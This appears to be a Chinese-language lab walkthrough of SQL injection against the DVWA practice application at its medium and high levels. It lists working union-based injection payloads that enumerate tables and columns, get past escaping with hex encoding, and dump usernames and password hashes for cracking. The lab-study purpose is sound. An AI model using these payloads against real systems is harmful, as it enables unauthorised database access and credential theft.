dvwa中med級別和high級別的sql注入

med級別:
1.提交id發現url上沒信息,說明這是個post類
2.用burp抓包,並將數據包發送到repeater中
3.在post的數據中添加內容1' or 1=1#報錯,說明提交的信息通過處理的
4.找到源碼能夠看出Medium級別的代碼利用mysql_real_escape_string函數對特殊符號\x00,\n,\r,\,’,」,\x1a進行轉義
5.添加內容or1=1#測試,成功,說明是數字型注入
6.添加2 order by 2 #、2 order by 3 #測試能夠看出字段有兩個
7.添加2 union select 1 ,database()#,查看數據庫爲dvwa
8.查看錶名
2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
有用的表爲users
9.獲取字段名:
union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #須要對'users'進行16進制轉碼,否則報錯,有用的字段名爲user和password
10獲取用戶和密碼信息:
2 union select group_concat(user),group_concat(password) from users #
 
11對user爲admin的密碼(5f4dcc3b5aa765d61d8327deb882cf99)進行md5解密:
hight級別
1.將DVWA security換成high級別。打開sql注入練習:
2.在輸入框中輸入1'測試:
3.輸入 1' and '1'='1測試:
 
4.輸入 1' and '1'='2測試,由結果判斷這是字符型注入
5. 輸入1' order by 2#、1' order by 3#判斷字段數,字段數爲2:
5. 獲取數據庫名:1' union select 1,database()#
 
6.獲取表名
輸入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
7.獲取數據庫中的列
輸入1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#能夠獲得user和password列
8.獲取user列和 password列的內容
輸入1' union select group_concat(user),group_concat(password) from users#
7.對user爲admin的密碼(5f4dcc3b5aa765d61d8327deb882cf99)進行md5解密:
相關文章
相關標籤/搜索